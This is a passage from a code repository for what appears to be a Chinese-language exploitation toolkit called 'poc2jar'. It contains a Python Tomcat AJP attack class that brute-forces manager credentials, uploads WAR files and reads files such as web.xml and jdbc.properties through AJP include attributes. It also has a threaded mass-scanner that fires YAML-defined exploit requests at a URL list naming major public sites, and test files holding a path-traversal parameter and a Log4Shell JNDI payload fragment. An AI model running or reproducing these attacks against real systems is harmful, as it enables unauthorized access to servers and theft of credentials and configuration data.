%s:%s" % (user, password)) 104 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 105 | snd_hdrs_res = responses[0] 106 | if snd_hdrs_res.http_status_code == 404: 107 | raise NotFoundException("The req_uri %s does not exist!" % self.req_uri) 108 | elif snd_hdrs_res.http_status_code == 302: 109 | self.req_uri = snd_hdrs_res.response_headers.get('Location', '') 110 | logger.info("Redirecting to %s" % self.req_uri) 111 | self.forward_request.req_uri = self.req_uri 112 | elif snd_hdrs_res.http_status_code == 200: 113 | logger.info("Found valid credz: %s:%s" % (user, password)) 114 | res = True 115 | stop = True 116 | if 'Set-Cookie' in snd_hdrs_res.response_headers: 117 | logger.info("Here is your cookie: %s" % (snd_hdrs_res.response_headers.get('Set-Cookie', ''))) 118 | elif snd_hdrs_res.http_status_code == 403: 119 | logger.info("Found valid credz: %s:%s but the user is not authorized to access this resource" % ( 120 | user, password)) 121 | stop = True 122 | elif snd_hdrs_res.http_status_code == 401: 123 | stop = True 124 | 125 | return res 126 | 127 | def start_bruteforce(self, users, passwords, req_uri, autostop): 128 | logger.info("Attacking a tomcat at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 129 | self.req_uri = req_uri 130 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri) 131 | 132 | f_users = open(users, "r") 133 | f_passwords = open(passwords, "r") 134 | 135 | valid_credz = [] 136 | try: 137 | for user in f_users: 138 | f_passwords.seek(0, 0) 139 | for password in f_passwords: 140 | if autostop and len(valid_credz) > 0: 141 | self.socket.close() 142 | return valid_credz 143 | 144 | user = user.rstrip('\n') 145 | password = password.rstrip('\n') 146 | if self.test_password(user, password): 147 | valid_credz.append((user, password)) 148 | except NotFoundException as e: 149 | logger.fatal(e.message) 150 | finally: 151 | logger.debug("Closing socket...") 152 | self.socket.close() 153 | return valid_credz 154 | 155 | def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): 156 | self.req_uri = req_uri 157 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, 158 | method=AjpForwardRequest.REQUEST_METHODS.get(method)) 159 | logger.debug("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 160 | if user is not None and password is not None: 161 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ( 162 | "%s:%s" % (user, password)).encode('base64').replace('\n', '') 163 | 164 | for h in headers: 165 | self.forward_request.request_headers[h] = headers[h] 166 | 167 | for a in attributes: 168 | self.forward_request.attributes.append(a) 169 | 170 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 171 | print(responses) 172 | if len(responses) == 0: 173 | return None, None 174 | 175 | snd_hdrs_res = responses[0] 176 | 177 | data_res = responses[1:-1] 178 | if len(data_res) == 0: 179 | logger.info("No data in response. Headers:\n %s" % pformat(vars(snd_hdrs_res))) 180 | 181 | return snd_hdrs_res, data_res 182 | 183 | def upload(self, filename, user, password, old_version, headers={}): 184 | deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) 185 | with open(filename, "rb") as f_input: 186 | with open("/tmp/request", "w+b") as f: 187 | s_form_header = '------WebKitFormBoundaryb2qpuwMoVtQJENti\r\nContent-Disposition: form-data; name="deployWar"; filename="%s"\r\nContent-Type: application/octet-stream\r\n\r\n' % os.path.basename( 188 | filename) 189 | s_form_footer = '\r\n------WebKitFormBoundaryb2qpuwMoVtQJENti--\r\n' 190 | f.write(s_form_header) 191 | f.write(f_input.read()) 192 | f.write(s_form_footer) 193 | 194 | data_len = os.path.getsize("/tmp/request") 195 | 196 | headers = { 197 | "SC_REQ_CONTENT_TYPE": "multipart/form-data; boundary=----WebKitFormBoundaryb2qpuwMoVtQJENti", 198 | "SC_REQ_CONTENT_LENGTH": "%d" % data_len, 199 | "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), 200 | "Origin": "http://%s" % (self.target_host), 201 | } 202 | if obj_cookie is not None: 203 | headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') 204 | 205 | attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, 206 | {"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "12345")}] 207 | if old_version == False: 208 | attributes.append({"name": "query_string", "value": deploy_csrf_token}) 209 | old_apps = self.list_installed_applications(user, password, old_version) 210 | r = self.perform_request("/manager/html/upload", headers=headers, method="POST", user=user, password=password, 211 | attributes=attributes) 212 | 213 | with open("/tmp/request", "rb") as f: 214 | br = AjpBodyRequest(f, data_len, AjpBodyRequest.SERVER_TO_CONTAINER) 215 | br.send_and_receive(self.socket, self.stream) 216 | 217 | r = AjpResponse.receive(self.stream) 218 | if r.prefix_code == AjpResponse.END_RESPONSE: 219 | logger.error('Upload failed') 220 | 221 | while r.prefix_code != AjpResponse.END_RESPONSE: 222 | r = AjpResponse.receive(self.stream) 223 | logger.debug('Upload seems normal. Checking...') 224 | new_apps = self.list_installed_applications(user, password, old_version) 225 | if len(new_apps) == len(old_apps) + 1 and new_apps[:-1] == old_apps: 226 | logger.info('Upload success!') 227 | else: 228 | logger.error('Upload failed') 229 | 230 | def get_error_page(self): 231 | return self.perform_request("/blablablablabla") 232 | 233 | def get_version(self): 234 | hdrs, data = self.get_error_page() 235 | for d in data: 236 | s = re.findall('(Apache Tomcat/[0-9\.]+) ', d.data) 237 | if len(s) > 0: 238 | return s[0] 239 | 240 | def get_csrf_token(self, user, password, old_version, headers={}, query=[]): 241 | # first we request the manager page to get the CSRF token 242 | hdrs, rdata = self.perform_request("/manager/html", headers=headers, user=user, password=password) 243 | deploy_csrf_token = re.findall('(org.apache.catalina.filters.CSRF_NONCE=[0-9A-F]*)"', 244 | "".join([d.data for d in rdata])) 245 | if old_version == False: 246 | if len(deploy_csrf_token) == 0: 247 | logger.critical("Failed to get CSRF token. Check the credentials") 248 | return 249 | 250 | logger.debug('CSRF token = %s' % deploy_csrf_token[0]) 251 | obj = re.match("(?PJSESSIONID=[0-9A-F]*); Path=/manager(/)?; HttpOnly", 252 | hdrs.response_headers.get('Set-Cookie', '')) 253 | if obj is not None: 254 | return deploy_csrf_token[0], obj 255 | return deploy_csrf_token[0], None 256 | 257 | def list_installed_applications(self, user, password, old_version, headers={}): 258 | deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) 259 | headers = { 260 | "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", 261 | "SC_REQ_CONTENT_LENGTH": "0", 262 | "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), 263 | "Origin": "http://%s" % (self.target_host), 264 | } 265 | if obj_cookie is not None: 266 | headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') 267 | 268 | attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, 269 | {"name": "req_attribute", 270 | "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] 271 | if old_version == False: 272 | attributes.append({ 273 | "name": "query_string", "value": "%s" % deploy_csrf_token}) 274 | hdrs, data = self.perform_request("/manager/html/", headers=headers, method="GET", user=user, password=password, 275 | attributes=attributes) 276 | found = [] 277 | for d in data: 278 | im = re.findall('/manager/html/expire\?path=([^&]*)&', d.data) 279 | for app in im: 280 | found.append(unquote(app)) 281 | return found 282 | 283 | def undeploy(self, path, user, password, old_version, headers={}): 284 | deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) 285 | path_app = "path=%s" % path 286 | headers = { 287 | "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", 288 | "SC_REQ_CONTENT_LENGTH": "0", 289 | "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), 290 | "Origin": "http://%s" % (self.target_host), 291 | } 292 | if obj_cookie is not None: 293 | headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') 294 | 295 | attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, 296 | {"name": "req_attribute", 297 | "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] 298 | if old_version == False: 299 | attributes.append({ 300 | "name": "query_string", "value": "%s&%s" % (path_app, deploy_csrf_token)}) 301 | r = self.perform_request("/manager/html/undeploy", headers=headers, method="POST", user=user, password=password, 302 | attributes=attributes) 303 | r = AjpResponse.receive(self.stream) 304 | if r.prefix_code == AjpResponse.END_RESPONSE: 305 | logger.error('Undeploy failed') 306 | 307 | # Check the successful message 308 | found = False 309 | regex = r'Message:<\/strong><\/small> <\/td>\s*
(OK - .*' + path + ')\s*<\/pre><\/td>'
310 |         while r.prefix_code != AjpResponse.END_RESPONSE:
311 |             r = AjpResponse.receive(self.stream)
312 |             if r.prefix_code == 3:
313 |                 f = re.findall(regex, r.data)
314 |                 if len(f) > 0:
315 |                     found = True
316 |         if found:
317 |             logger.info('Undeploy succeed')
318 |         else:
319 |             logger.error('Undeploy failed')
320 | 
321 | 
322 | if __name__ == "__main__":
323 | 
324 | 
325 |     parser = argparse.ArgumentParser()
326 |     parser.add_argument('target', type=str, help="Hostname or IP to attack")
327 |     parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
328 |     parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
329 |     args = parser.parse_args()
330 |     bf = Tomcat(args.target, args.port)
331 |     attributes = [
332 |         {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
333 |         {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', args.file]},
334 |         {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
335 |     ]
336 |     snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
337 |     print("".join([d.data for d in data_res]))
338 | 
339 |     if "WEB-INF" in "".join([d.data for d in data_res]) or "properties" in "".join([d.data for d in data_res]):
340 | 	    print("**********************注意可能有WEB-INF、properties配置文件*************************")
341 | 
342 |     if "classpath" in "".join([d.data for d in data_res]) :
343 | 	    print("**********************注意可能有classpath的xml文件*************************")
344 | 
345 |     words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties',
346 | 'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',
347 | 'WEB-INF/classes/spring-websocket-v2.0.xml','WEB-INF/classes/spring-mvc.xml','WEB-INF/classes/log4j.properties']
348 | 
349 |     for word in words_list:
350 | 
351 |         print(":::::::::" + word + ":::::::::")
352 |         attributes = [
353 |         {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
354 |         {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', word]},
355 |         {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
356 |     ]
357 |         snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
358 |         if "Error report" in "".join([d.data for d in data_res]):
359 | 		    pass
360 |         else:
361 |             print("".join([d.data for d in data_res]))
362 | 
363 | 
364 | 


--------------------------------------------------------------------------------
/pythonexp/poc2jarpiliang.py:
--------------------------------------------------------------------------------
 1 | # -*- coding:utf-8 -*-
 2 | # author:f0ngf0ng
 3 | 
 4 | # 入参为:yml文件 url.txt  yml文件里有时间条件、关键词条件
 5 | # command写死在java里,直接python3 xxxx.py xx.yml即可
 6 | # java输出为文件,
 7 | # 如http://x.x.x.x ————————vul
 8 | #   http://x.x.x.x ———————
 9 | 
10 | import requests
11 | import csv,yaml,os
12 | from concurrent.futures import ThreadPoolExecutor
13 | import sys
14 | 
15 | proxies = {
16 |     'http':'127.0.0.1:8080',
17 |     'https':'127.0.0.1:8080'
18 | }
19 | 
20 | def exp(url,ymlfile):
21 |     global words
22 |     # 获取当前脚本所在文件夹路径
23 |     curPath = os.path.dirname(os.path.realpath(__file__))
24 |     # 获取yaml文件路径
25 |     yamlPath = os.path.join(curPath + '/..' , ymlfile)
26 |     # open方法打开直接读出来
27 |     f = open(yamlPath, 'r', encoding='utf-8')
28 |     cfg = f.read()
29 | 
30 |     d = yaml.load(cfg, Loader=yaml.FullLoader)  # 用load方法转字典
31 | 
32 |     for _ in d:
33 |         if _ == "method":
34 |             method = d[_]  # 请求方法
35 | 
36 |         if _ == "uri":
37 |             uri = d[_]  # 请求的uri
38 | 
39 |         if _ == "param":
40 |             param = d[_]  # 加在uri后面的带入的参数
41 | 
42 |         if _ == "data":
43 |             data = d[_]  # 请求体,如果没有的话,就为空,后续发请求需要判断
44 | 
45 |         if _ == "others":
46 |             headers = d[_]  # 将others参数设置为headers头
47 | 
48 |         if _ == "condition":
49 |             words = d[_]['words']  # 关键字条件
50 |             time = d[_]['time']  # 时间条件
51 | 
52 |     for value in headers:  # 因为有纯数字,需要转成string
53 |         if type(headers[value]) == int:
54 |             headers[value] = str(headers[value])
55 | 
56 |     try:
57 |         if method == "GET":
58 |             requests.packages.urllib3.disable_warnings()
59 |             r = requests.get(url + uri + "?" + param, headers=headers, timeout=5, verify=False )
60 |         elif( method == "POST" ):
61 |             requests.packages.urllib3.disable_warnings()
62 |             r = requests.get(url + uri + "?" + param, data=data ,headers=headers, timeout=5, verify=False )
63 |         elif( method == "PUT" ):
64 |             requests.packages.urllib3.disable_warnings()
65 |             r = requests.put(url + uri + "?" + param, data=data ,headers=headers, timeout=5, verify=False )
66 | 
67 |         # 把响应头和响应体转换成string
68 |         total = ""
69 |         for _ in r.headers:
70 |             total = total + _ + ":" + r.headers[_] +'\n'
71 |         total = total + r.text
72 | 
73 |         if words != "":
74 |             if words in total:
75 |                 url = url  + '…………vul'
76 |         print(url)
77 | 
78 |     except Exception as e:
79 |         pass
80 | 
81 | if __name__ == '__main__':
82 |     data = open('pythonexp/url.txt') # 批量IP
83 |     ymlFile = sys.argv[1]
84 |     reader = csv.reader(data) # 50是线程
85 | 
86 |     with ThreadPoolExecutor(50) as pool:
87 |         for row in reader:
88 |             if 'http' not in row[0]:
89 |                 url = 'http://' + row[0]
90 |             else:
91 |                 url = row[0]
92 |             pool.submit(exp, url , ymlFile)


--------------------------------------------------------------------------------
/pythonexp/url.txt:
--------------------------------------------------------------------------------
1 | https://www.taobao.com
2 | https://www.baidu.com


--------------------------------------------------------------------------------
/src/main/Main.java:
--------------------------------------------------------------------------------
 1 | package main;
 2 | 
 3 | 
 4 | import java.io.BufferedReader;
 5 | import java.io.IOException;
 6 | import java.io.InputStream;
 7 | import java.io.InputStreamReader;
 8 | import java.net.URL;
 9 | import java.nio.charset.Charset;
10 | import java.util.jar.JarEntry;
11 | import java.util.jar.JarFile;
12 | import javafx.application.Application;
13 | import javafx.fxml.FXMLLoader;
14 | import javafx.scene.Parent;
15 | import javafx.scene.Scene;
16 | import javafx.stage.Stage;
17 | import java.util.Properties;
18 | //import sun.misc.IOUtils;
19 | import java.lang.System;
20 | 
21 | 
22 | public class Main extends Application {
23 | 
24 |     @Override
25 |     public void start(Stage primaryStage) throws Exception{
26 | //        System.out.println(getClass().getResource("/poc2expgui.fxml").toString());
27 |         Parent root = FXMLLoader.load(getClass().getResource("/poc2expgui.fxml"));
28 |         primaryStage.setTitle("poc2jar综合利用工具 v0.55  f0ng");
29 |         primaryStage.setScene(new Scene(root));
30 |         primaryStage.show();
31 |     }
32 | 
33 |     public static void main(String[] args) throws IOException {
34 | 
35 |         launch(args);
36 | 
37 |     }
38 | }


--------------------------------------------------------------------------------
/src/main/ProxyController.java:
--------------------------------------------------------------------------------
 1 | package main;
 2 | 
 3 | import java.io.IOException;
 4 | import java.net.URL;
 5 | import java.util.ResourceBundle;
 6 | 
 7 | import javafx.event.ActionEvent;
 8 | import javafx.fxml.FXML;
 9 | import javafx.fxml.FXMLLoader;
10 | import javafx.fxml.Initializable;
11 | import javafx.scene.Parent;
12 | import javafx.scene.Scene;
13 | import javafx.scene.control.Button;
14 | import javafx.scene.control.TextField;
15 | import javafx.stage.Stage;
16 | import main.util.StageManager;
17 | 
18 | 
19 | public class ProxyController {
20 | 
21 |     @FXML
22 |     public TextField mTextField66;
23 | 
24 |     @FXML
25 |     private TextField mTextField62;
26 | 
27 | 
28 | //    public void initialize() throws IOException {
29 | //        Poc2ExpguiController index=(Poc2ExpguiController) StageManager.CONTROLLER.get("Poc2ExpguiController");
30 | //
31 | //        String ipporthttp = mTextField66.getText().trim();
32 | //        if (ipporthttp.equals("")){
33 | //            mTextField66.setText("127.0.0.1:8080");
34 | //        }else{
35 | //            String index_ipport = index.mLabeltest.getText().trim();
36 | //            String[] index_ipport_lists = index_ipport.split("ip:port为:");
37 | //            mTextField66.setText(index_ipport_lists[1]);
38 | //        }
39 | //    }
40 | /**
41 |   * 传递数据至主窗口
42 |   * @param event
43 |   */
44 |         public void openThrid(ActionEvent event) {
45 |             Poc2ExpguiController index=(Poc2ExpguiController) StageManager.CONTROLLER.get("Poc2ExpguiController");
46 | 
47 |             String ipporthttp = mTextField66.getText().trim();
48 | 
49 |             String ipportsocks = mTextField62.getText().trim();
50 | 
51 | //            System.out.println(ipporthttp);
52 | //            System.out.println(ipportsocks);
53 | 
54 |             if (!ipporthttp.equals("") ){
55 |                 index.mLabeltest.setText("现在是http/https代理,ip:port为:" + ipporthttp);
56 |             } else if (!ipportsocks.equals(""))
57 |                 index.mLabeltest.setText("现在是socks代理,ip:port为:" + ipportsocks);
58 |             else
59 |                 index.mLabeltest.setText("代理地址为空" + ipportsocks);
60 | 
61 | }
62 | 
63 | 
64 | }
65 |  
66 |  


--------------------------------------------------------------------------------
/src/main/RequestPoc/Poclist.java:
--------------------------------------------------------------------------------
  1 | package main.RequestPoc;
  2 | 
  3 | import java.io.File;
  4 | import java.io.FileNotFoundException;
  5 | import java.util.*;
  6 | import java.util.concurrent.Callable;
  7 | import java.util.concurrent.ExecutorService;
  8 | import java.util.concurrent.Executors;
  9 | import java.util.concurrent.Future;
 10 | import java.util.concurrent.locks.Lock;
 11 | import java.util.concurrent.locks.ReentrantLock;
 12 | import javafx.collections.FXCollections;
 13 | import javafx.collections.ObservableList;
 14 | import static main.RequestPoc.Readfile.exptoexp;
 15 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 16 | import static main.RequestPoc.makeRequest.listMakeRequest;
 17 | import static main.RequestPoc.makeRequest.inputurl;
 18 | 
 19 | public class Poclist {
 20 | 
 21 | 
 22 | 
 23 |     // 第一个函数,获取所有的poc文件夹名,如poc/tongda、poc/fanwei等
 24 |     // 第二个函数,根据选中的属性,比如选中了tongda文件夹,来出现tongda文件夹下面的所有poc名称
 25 |     // 第三个函数,根据选中的poc来发起exp请求
 26 | 
 27 |     public static void main(String[] args) throws FileNotFoundException {
 28 | //        System.setProperty("https.proxyHost", "127.0.0.1");
 29 | //        System.setProperty("https.proxyPort", "8080");
 30 | //        System.setProperty("http.proxyHost", "127.0.0.1");
 31 | //        System.setProperty("http.proxyPort", "8080");
 32 | 
 33 | 
 34 |         
 35 | 
 36 |     }
 37 | 
 38 |     // 第一个函数,获取所有的poc文件夹名,如poc/tongda、poc/fanwei等
 39 |     public static ObservableList dirnametlistview1(String dirname) throws FileNotFoundException {
 40 |         ObservableList strList = FXCollections.observableArrayList() ;
 41 |         File file = new File(dirname);
 42 |         if (file.exists()) {
 43 |             File[] files = file.listFiles();
 44 |             for (File file2 : files) {
 45 |                 if (file2.isDirectory()) {
 46 |                     String[] arr = file2.getAbsolutePath().split("/");
 47 |                     int next = arr.length-1;
 48 |                     strList.add(file2.getAbsolutePath().split("/")[next]);
 49 |                 }
 50 |             }
 51 | 
 52 |         } else {
 53 |             System.out.println("文件不存在!");
 54 |         }
 55 |         return strList;
 56 | 
 57 |     }
 58 | 
 59 | 
 60 |     // 第二个函数,根据选中的属性,比如选中了tongda文件夹,来出现tongda文件夹下面的所有poc名称
 61 |     public static ObservableList dirnametlistview2(String dirname) throws FileNotFoundException {
 62 |         ObservableList strList = FXCollections.observableArrayList() ;
 63 |         File file = new File(dirname);
 64 |         if (file.exists()) {
 65 |             File[] files = file.listFiles();
 66 |             for (File file2 : files) {
 67 |                 if (!file2.isDirectory() && !file2.getAbsolutePath().contains(".DS_Store")) {
 68 |                     System.out.println("文件:" + file2.getAbsolutePath());
 69 |                     String[] arr = file2.getAbsolutePath().split("/");
 70 | 
 71 |                     int next = arr.length-1;
 72 |                     strList.add(file2.getAbsolutePath().split("/")[next]);
 73 |                 }
 74 |             }
 75 |         } else {
 76 |             System.out.println("文件不存在!");
 77 |         }
 78 |         return strList;
 79 |     }
 80 | 
 81 | 
 82 |     // 第三个函数,根据选中的poc来发起exp请求
 83 |     public static String[] poctoexp(String pocname ,String url,String ishttps) throws FileNotFoundException {
 84 |         String[] poctoexplist = new String[2];
 85 |         String responsetime = null;
 86 |         String responseheaderbody = null;
 87 |         // 读取yml文件为explist
 88 |         String[] explist = ymlFiletoexp(pocname);
 89 |         System.out.println("explist");
 90 | //        for (String strr : explist)
 91 | //            if (strr != null)
 92 | //                System.out.println(strr);
 93 | 
 94 | //         根据explist转换为requestheader
 95 |         String[][] requestHeader = exptoexp(explist);
 96 | 
 97 | //        for (String[] str : requestHeader)
 98 | //            for (String strr : str)
 99 | //                if (strr != null)
100 | //                    System.out.println(strr);
101 | 
102 |         // 根据requestheader替换目标url
103 |         String[][] requestHeader2 = inputurl(requestHeader,url);
104 |         System.out.println("requestHeader2");
105 |         for (String[] str : requestHeader2)
106 |             for (String strr : str)
107 |                 if (strr != null)
108 |                     System.out.println(strr);
109 | 
110 | 
111 |         // 根据替换后的url来发起请求
112 |         Map responseHeaderbody = listMakeRequest(requestHeader2,ishttps);
113 |         for (String key : responseHeaderbody.keySet()) {
114 | 
115 |         try {
116 | 
117 |                 String[] response = responseHeaderbody.get(key).split("ms\n");
118 |                 responsetime = response[0].split(":")[1].split("ms")[0];
119 |                 responseheaderbody = key.replace("null:", "").replace("[", "").replace("]", "") + '\n' + response[1];
120 | //            System.out.println(responseheaderbody);
121 |         }catch (ArrayIndexOutOfBoundsException e){ // 捕捉响应为空的请求体
122 |             responseheaderbody = key.replace("null:", "").replace("[", "").replace("]", "") + '\n';
123 |         }
124 |         }
125 |         poctoexplist[0] = responsetime;
126 |         poctoexplist[1] = responseheaderbody;
127 |         System.out.println("responsetime" + responsetime);
128 |         System.out.println("responseheaderbody" + responseheaderbody);
129 | 
130 |         return poctoexplist;
131 |     }
132 | 
133 | 
134 | }
135 | 
136 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test.java:
--------------------------------------------------------------------------------
 1 | package main.RequestPoc;
 2 | 
 3 | import java.util.*;
 4 | import static main.RequestPoc.makeRequest.listMakeRequest;
 5 | import sun.net.www.MessageHeader;
 6 | 
 7 | public class test extends MessageHeader  {
 8 |     @Override
 9 |     public synchronized void setIfNotSet(String arg0, String arg1) {
10 | //        System.out.println("hook: " + arg0);
11 |         if ("Content-type".equals(arg0)) {
12 |         return;
13 |     }
14 | 
15 |         if ("Connection".equals(arg0)) {
16 |         return;
17 |     }
18 | 
19 |         if ("Accept".equals(arg0)) {
20 |         return;
21 |     }
22 | 
23 |         super.setIfNotSet(arg0, arg1);
24 | }
25 | 
26 |     public int nkeys;
27 |     public String[] keys;
28 |     public String[] values;
29 | 
30 | 
31 |     public static void main(String[] args) {
32 |         {
33 |             String total = "";
34 |             String str = "param: DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts";
35 |             for (String strr: java.util.Arrays.copyOfRange(str.split(":"),1,str.split(":").length))
36 | 
37 |                 total = total + ":" + strr.trim();
38 | 
39 |             System.out.println(total.substring(1));
40 | 
41 | 
42 |         }
43 |     }
44 |     public static void listMakeRequest (String[][] request_header, String ishttps) {
45 | 
46 |     }
47 | 
48 | 
49 | }
50 | 
51 | 
52 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test3.java:
--------------------------------------------------------------------------------
 1 | package main.RequestPoc;
 2 | 
 3 | import java.net.URLDecoder;
 4 | import java.net.URLEncoder;
 5 | import java.util.HashMap;
 6 | import java.util.Map;
 7 | import java.util.regex.Matcher;
 8 | import java.util.regex.Pattern;
 9 | 
10 | public class test3 {
11 |     public static void main(String[] args) {
12 |         String a = "%24%7Bjndi:ldap://%24%7BhostName%7DXXXX%24%7B::-.%ht";
13 |         String decode_text = "";
14 |         a = a.replaceAll("%(?![0-9a-fA-F]{2})", "%25");
15 |         try {
16 |             decode_text = URLDecoder.decode(a, "utf-8");
17 |         }catch (Exception e){
18 |             e.printStackTrace();
19 |         }
20 | 
21 |         System.out.println(decode_text);
22 | 
23 |     }
24 | }
25 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test4.java:
--------------------------------------------------------------------------------
 1 | package main.RequestPoc;
 2 | 
 3 | import java.io.FileNotFoundException;
 4 | import java.util.Map;
 5 | import static main.RequestPoc.Readfile.exptoexp;
 6 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 7 | import static main.RequestPoc.makeRequest.inputurl;
 8 | import static main.RequestPoc.makeRequest.listMakeRequest;
 9 | 
10 | public class test4 {
11 |     public static void main(String[] args) {
12 | 
13 |     }
14 | 
15 |     // 第四个函数,根据选中的poc来发起exp请求,返回为url是否有漏洞的数组,即[url1 vul,url2 notvul………………]
16 |     public static String[] poctoexp(String pocname ,String[] urllist,int conditiontime,String conditionwords) throws FileNotFoundException {
17 |         String[] poctoexplist = new String[10000];
18 |         int i = 0,a = 0;
19 |         String responsetime = null;
20 |         String responseheaderbody = null;
21 |         // 读取yml文件为explist
22 |         String[] explist = ymlFiletoexp(pocname);
23 | 
24 |         //  根据explist转换为requestheader
25 |         String[][] requestHeader = exptoexp(explist);
26 | 
27 |         for (String url : urllist) {
28 |             // 根据requestheader替换目标url
29 |             String[][] requestHeader2 = inputurl(requestHeader, url);
30 | 
31 |             // 根据替换后的url来发起请求
32 |             Map responseHeaderbody = listMakeRequest(requestHeader2);
33 |             for (String key : responseHeaderbody.keySet()) {
34 |                 try {
35 |                     String[] response = responseHeaderbody.get(key).split("\n");
36 |                     responsetime = response[0].split(":")[1].split("ms")[0];
37 |                     responseheaderbody = key.replace("null:", "").replace("[", "").replace("]", "") + '\n' + response[1];
38 |                 } catch (ArrayIndexOutOfBoundsException e) { // 捕捉响应为空的请求体
39 |                     responseheaderbody = key.replace("null:", "").replace("[", "").replace("]", "") + '\n';
40 |                 }
41 |             }
42 | 
43 |             a = Integer.parseInt(responsetime);
44 | 
45 |             if ((responseheaderbody.contains(conditionwords))&&(!conditionwords.equals(""))  ||  (( a >= conditiontime) && ( a <= 1.5 * conditiontime))){
46 |                 poctoexplist[i] = url + "``````````````````````````存在漏洞";
47 |             }else{
48 |                 poctoexplist[i] = url ;
49 |             }
50 |             i++;
51 | 
52 |         }
53 | 
54 | 
55 |         return poctoexplist;
56 |     }
57 | }
58 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test6test.java:
--------------------------------------------------------------------------------
  1 | package main.RequestPoc;
  2 | 
  3 | import java.util.ArrayList;
  4 | import java.util.List;
  5 | import java.util.Map;
  6 | import java.util.concurrent.ExecutorService;
  7 | import java.util.concurrent.Executors;
  8 | import java.util.concurrent.locks.Lock;
  9 | import java.util.concurrent.locks.ReentrantLock;
 10 | import static main.RequestPoc.Readfile.exptoexp;
 11 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 12 | import static main.RequestPoc.makeRequest.inputurl;
 13 | import static main.RequestPoc.makeRequest.listMakeRequest;
 14 | 
 15 | public class test6test {
 16 |     private static List vullist = new ArrayList();
 17 |     public test6test() {
 18 | 
 19 |     }
 20 | 
 21 |     public void getUriList(String pocname,String[] url_list,int conditiontime ,String conditionwords){
 22 |         List list = new ArrayList();
 23 |         ExecutorService executor = Executors.newCachedThreadPool();
 24 |         try{
 25 |             for(int i = 0; i < url_list.length; i++) {
 26 |                 MyRunnable runnable = new MyRunnable(pocname,conditiontime, conditionwords);
 27 |                 Thread thread = new Thread(runnable, url_list[i]);
 28 |                 thread.start();
 29 |                 list.add(thread);
 30 |             }
 31 |             try {
 32 |                 for(Thread thread : list) {
 33 |                     thread.join();
 34 |                 }
 35 |             } catch (InterruptedException e) {
 36 |                 e.printStackTrace();
 37 |             }
 38 | 
 39 |         }catch (ArrayIndexOutOfBoundsException e){
 40 |             ;
 41 |         }
 42 |         executor.shutdown();
 43 |         while (!executor.isTerminated()){}
 44 |     }
 45 | 
 46 |     public static class MyRunnable implements Runnable {
 47 |         String pocname;
 48 |         String conditionwords;
 49 |         int conditiontime;
 50 |         public MyRunnable(String pocname,int conditiontime ,String conditionwords ){
 51 |             this.pocname = pocname;
 52 |             this.conditionwords = conditionwords;
 53 |             this.conditiontime = conditiontime;
 54 |         }
 55 | 
 56 |         @Override
 57 |         public void run() {
 58 |             System.out.println(Thread.currentThread().getName() + " start");
 59 |             Url a = new Url();
 60 |             a.addList(pocname,Thread.currentThread().getName(),conditiontime,conditionwords);
 61 |             System.out.println(Thread.currentThread().getName() + " end");
 62 |             System.out.println(vullist);
 63 |         }
 64 | 
 65 |     }
 66 |     public static class Url {
 67 | 
 68 |         private static Lock lock = new ReentrantLock();     // 开启显式家锁
 69 |         private static List urlList = new ArrayList();
 70 | 
 71 |         public Url() {
 72 |         }
 73 | 
 74 |         public void addList( String pocname,String url,int conditiontime,String conditionword){
 75 |             lock.lock();
 76 |             String[] final_list = new String[2];
 77 |             String poctoexplist = "";
 78 |             String ishttps = "http";
 79 |             int a ;
 80 |             try {
 81 |                 // 读取yml文件为explist
 82 |                 String[] explist = ymlFiletoexp(pocname);
 83 | 
 84 |                 // 根据explist转换为requestheader
 85 |                 String[][] requestHeader = exptoexp(explist);
 86 | 
 87 |                 // 根据requestheader替换目标url
